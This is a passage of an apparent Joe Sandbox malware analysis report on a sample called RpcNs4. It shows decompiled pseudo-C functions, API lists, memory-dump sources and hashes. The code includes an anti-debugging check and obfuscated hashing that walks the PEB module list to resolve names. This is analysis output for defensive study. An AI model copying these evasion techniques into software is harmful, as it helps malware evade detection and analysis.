                                                                                                      				_v544 =  *((intOrPtr*)(_t48 - 4));
                                                                                                      				_v804 = _a8;
                                                                                                      				_v800 = _a12;
                                                                                                      				_v792 = _v0;
                                                                                                      				_t67 = IsDebuggerPresent();
                                                                                                      				if(E0040679A( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                                                                                                      					_push(_a4);
                                                                                                      					E00406A64(_t55);
                                                                                                      				}
                                                                                                      				return E004023FF(_t59, _v8 ^ _t69, _t65, _t67, _t68);
                                                                                                      			}






































                                                                                                      0x00406a89
                                                                                                      0x00406a89
                                                                                                      0x00406a89
                                                                                                      0x00406a92
                                                                                                      0x00406a97
                                                                                                      0x00406a99
                                                                                                      0x00406aa1
                                                                                                      0x00406aa3
                                                                                                      0x00406aa6
                                                                                                      0x00406aab
                                                                                                      0x00406aab
                                                                                                      0x00406aac
                                                                                                      0x00406abe
                                                                                                      0x00406acc
                                                                                                      0x00406ad2
                                                                                                      0x00406ad8
                                                                                                      0x00406ade
                                                                                                      0x00406ae4
                                                                                                      0x00406aea
                                                                                                      0x00406af0
                                                                                                      0x00406af6
                                                                                                      0x00406afc
                                                                                                      0x00406b02
                                                                                                      0x00406b09
                                                                                                      0x00406b10
                                                                                                      0x00406b17
                                                                                                      0x00406b1e
                                                                                                      0x00406b25
                                                                                                      0x00406b2c
                                                                                                      0x00406b2d
                                                                                                      0x00406b36
                                                                                                      0x00406b3c
                                                                                                      0x00406b3f
                                                                                                      0x00406b45
                                                                                                      0x00406b52
                                                                                                      0x00406b5b
                                                                                                      0x00406b64
                                                                                                      0x00406b6d
                                                                                                      0x00406b79
                                                                                                      0x00406b8a
                                                                                                      0x00406b96
                                                                                                      0x00406b99
                                                                                                      0x00406b9e
                                                                                                      0x00406bad

                                                                                                      APIs
                                                                                                      • _memset.LIBCMT ref: 00406ABE
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 00406B73
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DebuggerPresent_memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2328436684-0
                                                                                                      • Opcode ID: b70a72b4f163497e440ca814b7d572e363027d5224cdb742048567323022ee29
                                                                                                      • Instruction ID: 03bba867ec7584826af2704d2d7fde24559ac31e522a02535e9fe237780098ac
                                                                                                      • Opcode Fuzzy Hash: b70a72b4f163497e440ca814b7d572e363027d5224cdb742048567323022ee29
                                                                                                      • Instruction Fuzzy Hash: F731D77490122C9BCB21DF29D9887CDB7F8BF08310F5041EAE80DA6291E7349F958F48
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E0040679A(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                      
                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                      				return UnhandledExceptionFilter(_a4);
                                                                                                      			}



                                                                                                      0x0040679f
                                                                                                      0x004067af

                                                                                                      APIs
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00406B87,?,?,?,00000000), ref: 0040679F
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 004067A8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3192549508-0
                                                                                                      • Opcode ID: 78e5cb3a1063dba014e7a4115c8fc41eca54ced023386e6461d12cab8a87066c
                                                                                                      • Instruction ID: f09599a3a053368f5ed1ce6155b073a79ad54295844724c91f57482f43b814fa
                                                                                                      • Opcode Fuzzy Hash: 78e5cb3a1063dba014e7a4115c8fc41eca54ced023386e6461d12cab8a87066c
                                                                                                      • Instruction Fuzzy Hash: 96B0923104820DABEF402FD2EC0DB597F2CEB05652F005020FA0D541618BB25C108A99
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E020B3E70(intOrPtr __ecx) {
                                                                                                      				signed int _t88;
                                                                                                      				signed int _t92;
                                                                                                      				intOrPtr* _t95;
                                                                                                      				signed short* _t98;
                                                                                                      				signed int _t103;
                                                                                                      				signed int _t108;
                                                                                                      				intOrPtr* _t110;
                                                                                                      				void* _t113;
                                                                                                      
                                                                                                      				 *((intOrPtr*)(_t113 + 0xc)) = __ecx;
                                                                                                      				_t95 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
                                                                                                      				 *((intOrPtr*)(_t113 + 0x18)) = _t95;
                                                                                                      				_t110 =  *_t95;
                                                                                                      				if(_t110 == _t95) {
                                                                                                      					L10:
                                                                                                      					return 0;
                                                                                                      				} else {
                                                                                                      					do {
                                                                                                      						_t98 =  *(_t110 + 0x30);
                                                                                                      						 *(_t113 + 0x14) = 0x92f;
                                                                                                      						 *(_t113 + 0x14) =  *(_t113 + 0x14) ^ 0x568b78e1;
                                                                                                      						 *(_t113 + 0x14) =  *(_t113 + 0x14) * 0x51;
                                                                                                      						 *(_t113 + 0x14) =  *(_t113 + 0x14) << 0xd;
                                                                                                      						 *(_t113 + 0x14) =  *(_t113 + 0x14) ^ 0x2b1775dc;
                                                                                                      						 *(_t113 + 0x14) =  *(_t113 + 0x14) ^ 0xcb52b5dc;
                                                                                                      						 *(_t113 + 0x10) = 0xbeaf;
                                                                                                      						 *(_t113 + 0x10) =  *(_t113 + 0x10) >> 2;
                                                                                                      						 *(_t113 + 0x10) =  *(_t113 + 0x10) ^ 0x00002fad;
                                                                                                      						 *(_t113 + 0x10) = 0x3227;
                                                                                                      						 *(_t113 + 0x10) =  *(_t113 + 0x10) + 0x6e31;
                                                                                                      						 *(_t113 + 0x10) =  *(_t113 + 0x10) + 0x9f63;
                                                                                                      						 *(_t113 + 0x10) =  *(_t113 + 0x10) >> 0xd;
                                                                                                      						 *(_t113 + 0x10) =  *(_t113 + 0x10) + 0x30b2;
                                                                                                      						 *(_t113 + 0x10) =  *(_t113 + 0x10) ^ 0x24a756b4;
                                                                                                      						 *(_t113 + 0x10) =  *(_t113 + 0x10) +  *(_t113 + 0x10) * 8 +  *(_t113 + 0x10) +  *(_t113 + 0x10) * 8;
                                                                                                      						 *(_t113 + 0x10) =  *(_t113 + 0x10) ^ 0x93c52d1e;
                                                                                                      						if( *_t98 != 0) {
                                                                                                      							do {
                                                                                                      								_t92 =  *(_t113 + 0x14);
                                                                                                      								 *(_t113 + 0x10) = 0xbeaf;
                                                                                                      								 *(_t113 + 0x10) =  *(_t113 + 0x10) >> 2;
                                                                                                      								 *(_t113 + 0x10) =  *(_t113 + 0x10) ^ 0x00002fad;
                                                                                                      								 *(_t113 + 0x10) = 0x3227;
                                                                                                      								 *(_t113 + 0x10) =  *(_t113 + 0x10) + 0x6e31;
                                                                                                      								 *(_t113 + 0x10) =  *(_t113 + 0x10) + 0x9f63;
                                                                                                      								 *(_t113 + 0x10) =  *(_t113 + 0x10) >> 0xd;
                                                                                                      								 *(_t113 + 0x10) =  *(_t113 + 0x10) + 0x30b2;
                                                                                                      								 *(_t113 + 0x10) =  *(_t113 + 0x10) ^ 0x24a756b4;
                                                                                                      								_t85 =  *(_t113 + 0x10);
                                                                                                      								_t108 =  *(_t113 + 0x14) << ( *(_t113 + 0x10) & 0x000000ff);
                                                                                                      								 *(_t113 + 0x10) =  *(_t113 + 0x10) + _t85 * 8 +  *(_t113 + 0x10) + _t85 * 8;
                                                                                                      								 *(_t113 + 0x10) =  *(_t113 + 0x10) ^ 0x93c52d1e;
                                                                                                      								_t88 =  *_t98 & 0x0000ffff;
                                                                                                      								_t103 =  *(_t113 + 0x14) << ( *(_t113 + 0x10) & 0x000000ff);
                                                                                                      								if(_t88 >= 0x41 && _t88 <= 0x5a) {
                                                                                                      									_t88 = _t88 + 0x20;
                                                                                                      								}
                                                                                                      								 *(_t113 + 0x14) = _t88;
                                                                                                      								_t98 =  &(_t98[1]);
                                                                                                      								 *(_t113 + 0x14) =  *(_t113 + 0x14) + _t108;
                                                                                                      								 *(_t113 + 0x14) =  *(_t113 + 0x14) + _t103;
                                                                                                      								 *(_t113 + 0x14) =  *(_t113 + 0x14) - _t92;
                                                                                                      							} while ( *_t98 != 0);
                                                                                                      							_t95 =  *((intOrPtr*)(_t113 + 0x18));
                                                                                                      						}
                                                                                                      						if(( *(_t113 + 0x14) ^ 0x342f04ae) ==  *((intOrPtr*)(_t113 + 0x1c))) {
                                                                                                      							return  *((intOrPtr*)(_t110 + 0x18));
                                                                                                      						} else {
                                                                                                      							goto L9;
                                                                                                      						}
                                                                                                      						goto L12;
                                                                                                      						L9:
                                                                                                      						_t110 =  *_t110;
                                                                                                      					} while (_t110 != _t95);
                                                                                                      					goto L10;
                                                                                                      				}
                                                                                                      				L12:
                                                                                                      			}











                                                                                                      0x020b3e79
                                                                                                      0x020b3e82
                                                                                                      0x020b3e87
                                                                                                      0x020b3e8b
                                                                                                      0x020b3e8f
                                                                                                      0x020b3fec
                                                                                                      0x020b3ff5
                                                                                                      0x020b3e95
                                                                                                      0x020b3e95
                                                                                                      0x020b3e95
                                                                                                      0x020b3e98
                                                                                                      0x020b3ea0
                                                                                                      0x020b3ead
                                                                                                      0x020b3eb1
                                                                                                      0x020b3eb6
                                                                                                      0x020b3ebe
                                                                                                      0x020b3ec6
                                                                                                      0x020b3ece
                                                                                                      0x020b3ed3
                                                                                                      0x020b3edb
                                                                                                      0x020b3ee3
                                                                                                      0x020b3eeb
                                                                                                      0x020b3ef3
                                                                                                      0x020b3ef8
                                                                                                      0x020b3f00
                                                                                                      0x020b3f11
                                                                                                      0x020b3f15
                                                                                                      0x020b3f21
                                                                                                      0x020b3f30
                                                                                                      0x020b3f30
                                                                                                      0x020b3f34
                                                                                                      0x020b3f3c
                                                                                                      0x020b3f41
                                                                                                      0x020b3f52
                                                                                                      0x020b3f5a
                                                                                                      0x020b3f62
                                                                                                      0x020b3f6a
                                                                                                      0x020b3f6f
                                                                                                      0x020b3f77
                                                                                                      0x020b3f7f
                                                                                                      0x020b3f83
                                                                                                      0x020b3f8a
                                                                                                      0x020b3f8e
                                                                                                      0x020b3f9f
                                                                                                      0x020b3fa2
                                                                                                      0x020b3fa7
                                                                                                      0x020b3fae
                                                                                                      0x020b3fae
                                                                                                      0x020b3fb1
                                                                                                      0x020b3fb5
                                                                                                      0x020b3fb8
                                                                                                      0x020b3fbc
                                                                                                      0x020b3fc0
                                                                                                      0x020b3fc4
                                                                                                      0x020b3fce
                                                                                                      0x020b3fce
                                                                                                      0x020b3fdf
                                                                                                      0x020b4000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b3fe1
                                                                                                      0x020b3fe1
                                                                                                      0x020b3fe4
                                                                                                      0x00000000
                                                                                                      0x020b3e95
                                                                                                      0x00000000

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: /$1n
                                                                                                      • API String ID: 0-2879956371
                                                                                                      • Opcode ID: 7939d8c297189f5e013c3d24d1ec921baf9a268fb97c96f4e6127b2c0bb14832
                                                                                                      • Instruction ID: af5509e75732f7ca554f6bba6e676a5931c7848eb6340f6621a034668c93e99b
                                                                                                      • Opcode Fuzzy Hash: 7939d8c297189f5e013c3d24d1ec921baf9a268fb97c96f4e6127b2c0bb14832
                                                                                                      • Instruction Fuzzy Hash: 8141ECB15093968BD356CF24D48945BBBF4FF80758F000D6EE4A096250E3B8DA4CCBA3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E020B3C90(signed short* __ecx) {
                                                                                                      				signed int _v4;
                                                                                                      				signed int _v8;
                                                                                                      				signed int _t57;
                                                                                                      				signed int _t59;
                                                                                                      				signed short* _t64;
                                                                                                      				signed int _t67;
                                                                                                      				signed int _t71;
                                                                                                      
                                                                                                      				_v4 = 0x92f;
                                                                                                      				_t64 = __ecx;
                                                                                                      				_v4 = _v4 ^ 0x568b78e1;
                                                                                                      				_v4 = _v4 * 0x51;
                                                                                                      				_v4 = _v4 << 0xd;
                                                                                                      				_v4 = _v4 ^ 0x2b1775dc;
                                                                                                      				_v4 = _v4 ^ 0xcb52b5dc;
                                                                                                      				_v8 = 0xbeaf;
                                                                                                      				_v8 = _v8 >> 2;
                                                                                                      				_v8 = _v8 ^ 0x00002fad;
                                                                                                      				_v8 = 0x3227;
                                                                                                      				_v8 = _v8 + 0x6e31;
                                                                                                      				_v8 = _v8 + 0x9f63;
                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                      				_v8 = _v8 + 0x30b2;
                                                                                                      				_v8 = _v8 ^ 0x24a756b4;
                                                                                                      				_v8 = _v8 + _v8 * 8 + _v8 + _v8 * 8;
                                                                                                      				_v8 = _v8 ^ 0x93c52d1e;
                                                                                                      				if( *((short*)(__ecx)) != 0) {
                                                                                                      					do {
                                                                                                      						_t59 = _v4;
                                                                                                      						_v8 = 0xbeaf;
                                                                                                      						_v8 = _v8 >> 2;
                                                                                                      						_v8 = _v8 ^ 0x00002fad;
                                                                                                      						_v8 = 0x3227;
                                                                                                      						_v8 = _v8 + 0x6e31;
                                                                                                      						_v8 = _v8 + 0x9f63;
                                                                                                      						_v8 = _v8 >> 0xd;
                                                                                                      						_v8 = _v8 + 0x30b2;
                                                                                                      						_v8 = _v8 ^ 0x24a756b4;
                                                                                                      						_t54 = _v8;
                                                                                                      						_t71 = _v4 << (_v8 & 0x000000ff);
                                                                                                      						_v8 = _v8 + _t54 * 8 + _v8 + _t54 * 8;
                                                                                                      						_v8 = _v8 ^ 0x93c52d1e;
                                                                                                      						_t57 =  *_t64 & 0x0000ffff;
                                                                                                      						_t67 = _v4 << (_v8 & 0x000000ff);
                                                                                                      						if(_t57 >= 0x41 && _t57 <= 0x5a) {
                                                                                                      							_t57 = _t57 + 0x20;
                                                                                                      						}
                                                                                                      						_v4 = _t57;
                                                                                                      						_t64 =  &(_t64[1]);
                                                                                                      						_v4 = _v4 + _t71;
                                                                                                      						_v4 = _v4 + _t67;
                                                                                                      						_v4 = _v4 - _t59;
                                                                                                      					} while ( *_t64 != 0);
                                                                                                      				}
                                                                                                      				return _v4;
                                                                                                      			}










                                                                                                      0x020b3c93
                                                                                                      0x020b3c9b
                                                                                                      0x020b3c9d
                                                                                                      0x020b3caa
                                                                                                      0x020b3cae
                                                                                                      0x020b3cb3
                                                                                                      0x020b3cbb
                                                                                                      0x020b3cc3
                                                                                                      0x020b3cca
                                                                                                      0x020b3cce
                                                                                                      0x020b3cd5
                                                                                                      0x020b3cdc
                                                                                                      0x020b3ce3
                                                                                                      0x020b3cea
                                                                                                      0x020b3cee
                                                                                                      0x020b3cf5
                                                                                                      0x020b3d04
                                                                                                      0x020b3d07
                                                                                                      0x020b3d12
                                                                                                      0x020b3d20
                                                                                                      0x020b3d20
                                                                                                      0x020b3d24
                                                                                                      0x020b3d2c
                                                                                                      0x020b3d31
                                                                                                      0x020b3d42
                                                                                                      0x020b3d4a
                                                                                                      0x020b3d52
                                                                                                      0x020b3d5a
                                                                                                      0x020b3d5f
                                                                                                      0x020b3d67
                                                                                                      0x020b3d6f
                                                                                                      0x020b3d73
                                                                                                      0x020b3d7a
                                                                                                      0x020b3d7e
                                                                                                      0x020b3d8f
                                                                                                      0x020b3d92
                                                                                                      0x020b3d97
                                                                                                      0x020b3d9e
                                                                                                      0x020b3d9e
                                                                                                      0x020b3da1
                                                                                                      0x020b3da5
                                                                                                      0x020b3da8
                                                                                                      0x020b3dac
                                                                                                      0x020b3db0
                                                                                                      0x020b3db4
                                                                                                      0x020b3dc0
                                                                                                      0x020b3dc8

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: /$1n
                                                                                                      • API String ID: 0-2879956371
                                                                                                      • Opcode ID: 00de813c1fa545ac75b8c4c65bee082fb5b78eaa24392c37ee32a18acb2d789e
                                                                                                      • Instruction ID: 41ede785360dda6eb544d02598d4b712f1aa70939c4b6ad7b94f59a9f2981639
                                                                                                      • Opcode Fuzzy Hash: 00de813c1fa545ac75b8c4c65bee082fb5b78eaa24392c37ee32a18acb2d789e
                                                                                                      • Instruction Fuzzy Hash: 6631CBB2908355AFD356DF25D48546ABBF4BF80764F01C86DE4E886250E3B88988DF43
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E020B3B50(char* __ecx) {
                                                                                                      				signed int _v4;
                                                                                                      				signed int _v8;
                                                                                                      				char* _t80;
                                                                                                      
                                                                                                      				_v4 = 0x92f;
                                                                                                      				_v4 = _v4 ^ 0x568b78e1;
                                                                                                      				_t80 = __ecx;
                                                                                                      				_v4 = _v4 * 0x51;
                                                                                                      				_v4 = _v4 << 0xd;
                                                                                                      				_v4 = _v4 ^ 0x2b1775dc;
                                                                                                      				_v4 = _v4 ^ 0xcb52b5dc;
                                                                                                      				_v8 = 0xbeaf;
                                                                                                      				_v8 = _v8 >> 2;
                                                                                                      				_v8 = _v8 ^ 0x00002fad;
                                                                                                      				_v8 = 0x3227;
                                                                                                      				_v8 = _v8 + 0x6e31;
                                                                                                      				_v8 = _v8 + 0x9f63;
                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                      				_v8 = _v8 + 0x30b2;
                                                                                                      				_v8 = _v8 ^ 0x24a756b4;
                                                                                                      				_v8 = _v8 + _v8 * 8 + _v8 + _v8 * 8;
                                                                                                      				_v8 = _v8 ^ 0x93c52d1e;
                                                                                                      				if( *__ecx != 0) {
                                                                                                      					do {
                                                                                                      						_t80 = _t80 + 1;
                                                                                                      						_v8 = 0xbeaf;
                                                                                                      						_v8 = _v8 >> 2;
                                                                                                      						_v8 = _v8 ^ 0x00002fad;
                                                                                                      						_v8 = 0x3227;
                                                                                                      						_v8 = _v8 + 0x6e31;
                                                                                                      						_v8 = _v8 + 0x9f63;
                                                                                                      						_v8 = _v8 >> 0xd;
                                                                                                      						_v8 = _v8 + 0x30b2;
                                                                                                      						_v8 = _v8 ^ 0x24a756b4;
                                                                                                      						_v8 = _v8 + _v8 * 8 + _v8 + _v8 * 8;
                                                                                                      						_v8 = _v8 ^ 0x93c52d1e;
                                                                                                      						_v4 =  *((char*)(_t80 - 1));
                                                                                                      						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
                                                                                                      						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
                                                                                                      						_v4 = _v4 - _v4;
                                                                                                      					} while ( *_t80 != 0);
                                                                                                      				}
                                                                                                      				return _v4;
                                                                                                      			}






                                                                                                      0x020b3b53
                                                                                                      0x020b3b5b
                                                                                                      0x020b3b69
                                                                                                      0x020b3b6b
                                                                                                      0x020b3b6f
                                                                                                      0x020b3b74
                                                                                                      0x020b3b7c
                                                                                                      0x020b3b84
                                                                                                      0x020b3b8c
                                                                                                      0x020b3b91
                                                                                                      0x020b3b99
                                                                                                      0x020b3ba1
                                                                                                      0x020b3ba9
                                                                                                      0x020b3bb1
                                                                                                      0x020b3bb6
                                                                                                      0x020b3bbe
                                                                                                      0x020b3bcf
                                                                                                      0x020b3bd3
                                                                                                      0x020b3bde
                                                                                                      0x020b3bf0
                                                                                                      0x020b3bf4
                                                                                                      0x020b3bf7
                                                                                                      0x020b3bff
                                                                                                      0x020b3c04
                                                                                                      0x020b3c15
                                                                                                      0x020b3c1d
                                                                                                      0x020b3c25
                                                                                                      0x020b3c2d
                                                                                                      0x020b3c32
                                                                                                      0x020b3c3a
                                                                                                      0x020b3c4d
                                                                                                      0x020b3c51
                                                                                                      0x020b3c66
                                                                                                      0x020b3c6a
                                                                                                      0x020b3c70
                                                                                                      0x020b3c74
                                                                                                      0x020b3c78
                                                                                                      0x020b3c82
                                                                                                      0x020b3c8b

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1n$1n
                                                                                                      • API String ID: 0-3532211146
                                                                                                      • Opcode ID: a4dd66be0f54f6d9e19ef792fcfe39ac24f3ce6e035d2108b92ceb5d2305b6f5
                                                                                                      • Instruction ID: 915a8842390d56ca3a85424f2921b53e71ae6c8445e554f5c1e4d5f85c76b5d0
                                                                                                      • Opcode Fuzzy Hash: a4dd66be0f54f6d9e19ef792fcfe39ac24f3ce6e035d2108b92ceb5d2305b6f5
                                                                                                      • Instruction Fuzzy Hash: D231DBB140D392AFD756CF24C58955BBBF4AB80B64F00C86DE4A887260D3B8C908DF43
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 37%
                                                                                                      			E0040FE0B(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                      				signed int _t5;
                                                                                                      				signed int _t6;
                                                                                                      				int _t8;
                                                                                                      
                                                                                                      				_t5 =  *0x438b98; // 0x3e83fa3a
                                                                                                      				_t6 = _t5 ^  *0x435040;
                                                                                                      				if(_t6 == 0) {
                                                                                                      					 *0x437794 = _a4;
                                                                                                      					_t8 = EnumSystemLocalesW(E0040FDF7, 1);
                                                                                                      					 *0x437794 =  *0x437794 & 0x00000000;
                                                                                                      					return _t8;
                                                                                                      				} else {
                                                                                                      					return  *_t6(_a4, _a8, _a12, 0);
                                                                                                      				}
                                                                                                      			}






                                                                                                      0x0040fe0e
                                                                                                      0x0040fe13
                                                                                                      0x0040fe19
                                                                                                      0x0040fe34
                                                                                                      0x0040fe39
                                                                                                      0x0040fe3f
                                                                                                      0x0040fe47
                                                                                                      0x0040fe1b
                                                                                                      0x0040fe29
                                                                                                      0x0040fe29

                                                                                                      APIs
                                                                                                      • EnumSystemLocalesW.KERNEL32(Function_0000FDF7,00000001), ref: 0040FE39
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099609381-0
                                                                                                      • Opcode ID: edb704bf47a59a5ab0a9504ab8a6b6aeddf6077f984ca58003f0dd85d7650c4c
                                                                                                      • Instruction ID: 30b321a58b998b160845180e3754b7cbb80e5c2cbe740612ebcd5350c81d0871
                                                                                                      • Opcode Fuzzy Hash: edb704bf47a59a5ab0a9504ab8a6b6aeddf6077f984ca58003f0dd85d7650c4c
                                                                                                      • Instruction Fuzzy Hash: 9EE04672140308ABEB218F94EC02F9A3BB5FB08710F101031F60C6A5A1C3B6A560DB48
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,0040D324,?,?,?,00000002), ref: 0040FEB8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: 9397cd74517d6fdb224d46565c70369d8e45f4f4626f27f89f250cce4a11613b
                                                                                                      • Instruction ID: 17edf8b972fcea241f044b432938aed0aa7a66364045b38b7dfb920521c90ac9
                                                                                                      • Opcode Fuzzy Hash: 9397cd74517d6fdb224d46565c70369d8e45f4f4626f27f89f250cce4a11613b
                                                                                                      • Instruction Fuzzy Hash: 92D01772000109FFCF019FD0EC05C6A7B69FB08324B404436F91855522DB3AA8209BA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00406769(_Unknown_base(*)()* _a4) {
                                                                                                      
                                                                                                      				return SetUnhandledExceptionFilter(_a4);
                                                                                                      			}



                                                                                                      0x00406776

                                                                                                      APIs
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?,?,004057E0,00405795), ref: 0040676F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3192549508-0
                                                                                                      • Opcode ID: 7c737174b513481f1215a5985d364d8ba2fd422e5401cc05964a36295a95c847
                                                                                                      • Instruction ID: f4dfced62b50315ba40ea79f4eb7e0b4ad1581f7b1b0592bd5f96bbd8c9c0ad0
                                                                                                      • Opcode Fuzzy Hash: 7c737174b513481f1215a5985d364d8ba2fd422e5401cc05964a36295a95c847
                                                                                                      • Instruction Fuzzy Hash: 33A0113000820CABAF002B82EC0888A3F2CEA002A0B000020F80C000208BA2AC208A88
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 66%
                                                                                                      			E020B1C10(void* __ecx) {
                                                                                                      				char _v4;
                                                                                                      				signed int _v8;
